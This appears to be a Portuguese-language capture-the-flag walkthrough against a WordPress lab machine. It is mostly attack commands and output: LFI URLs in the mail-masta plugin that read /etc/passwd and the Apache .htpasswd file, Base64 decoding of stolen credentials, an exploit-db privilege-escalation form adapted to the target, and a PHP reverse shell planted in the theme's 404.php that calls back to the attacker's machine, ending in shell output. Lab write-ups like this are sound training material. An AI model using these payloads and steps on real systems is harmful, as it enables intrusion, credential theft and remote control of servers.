# Scanning

IP: 192.168.1.104

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))


# Enumeration

http://192.168.1.104/wordpress/
http://192.168.1.104/wordpress/wp-admin/

Plugin: mail-masta - 1.0

=======================================================================================================================================

### Flag 2 - mail-masta - 1.0 - LFI/CRFI

#Enumeração do /etc/passwd:
http://192.168.1.104/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/etc/passwd
http://192.168.1.104/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

# Com curl consigo já pegar o /etc/passwd, já ordenado.
curl http://192.168.1.104/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
mysql:x:122:128:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin
spike:$1$spike$CxutB1qK2e4GnxLGmlXyJ.:0:0:root:/root:/bin/bash

# Enumeração da senha do apache:
# Tentei acessar pelo browser, sem sucesso, mas consegui pelo curl.
curl http://192.168.1.104/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd

# Encontrado uma hash ao acessar com o curl.
YWFydGk6YWFydGlAZ21haWwuY29t

#Hash - Base64:
echo -n "YWFydGk6YWFydGlAZ21haWwuY29t" | base64 -d
aarti:aarti@gmail.com

#Usuário do Wordpress encontrado:
aarti:aarti@gmail.com

# Encontrado um exploit para o plugin
searchsploit wp support
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation  | php/webapps/41006.txt

searchsploit -m 41006
cat 41006.txt 
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: web
 
1. Description

You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().

http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html

2. Proof of Concept

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="administrator">
	<input type="hidden" name="email" value="sth">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

Then you can go to admin panel.

# Modificado o exploit para o alvo e salvo como html e executado.
<form method="post" action="http://192.168.1.104/wordpress/wp-admin/admin-ajax.php">
	Username: <input type="text" name="username" value="aarti">
	<input type="hidden" name="email" value="aarti@gmail.com">
	<input type="hidden" name="action" value="loginGuestFacebook">
	<input type="submit" value="Login">
</form>

file:///home/joaofracassi/beco-xpl/ha-wordy/exploit.html

# Depois volta no site como administrador.
http://192.168.1.104/wordpress/

# Encontrado a "Flag 2":
http://192.168.1.104/wordpress/wp-admin/profile.php
Second Flag: 5DD1CC591CE1569A528E3BCF18CEEB5B
RootPassword: SWduaXRlQDEyMw==

# Decryptado hash Base64 do root:
echo -n "SWduaXRlQDEyMw==" | base64 -d
Ignite@123


# Baixado o PHP Reverse Shell.
# Configurado para fazer conexão reversa com meu Kali no ip 192.168.1.105 e na porta 1234.
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.1.105';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

# Logado como admin local do wordpress
admin / Ignite@123

# adicionado o shell reverso na pagina 404.php
# Adicionado ao inicio do arquivo 404.php e salvo a página.

OBS:. Para salvar a página é necessário desabilitar os plugins.

# No Kali executamos o netcat em modo de espera de conexão.
nc -vnlp 1234

# No alvo executamos a url para executar o script na página 404.php
http://192.168.1.104/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentysixteen
http://192.168.1.104/wordpress/wp-content/themes/twentysixteen/404.php

# No kali vai abrir o shell reverso.
root@Pentest:/home/joaofracassi/beco-xpl/ha-wordy# nc -vnlp 1234
listening on [any] 1234 ...
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.104] 57592
Linux ubuntu 5.4.0-48-generic #52~18.04.1-Ubuntu SMP Thu Sep 10 12:50:22 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 06:16:53 up 46 min,  0 users,  load average: 0.00, 0.02, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 
$ 

$ python3 -c 'import pty;pty.spawn("/bin/bash")'       
www-data@ubuntu:/$ 

# Agora basta escalar privilégios.








Links:
https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin-SQL-Injection-Vulnerability
https://www.exploit-db.com/exploits/40290
https://www.exploit-db.com/exploits/41438
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
https://www.exploit-db.com/exploits/41006
https://stackoverflow.com/questions/52671255/wordpress-editor-not-updating-files-unable-to-communicate-back-with-site-to-che

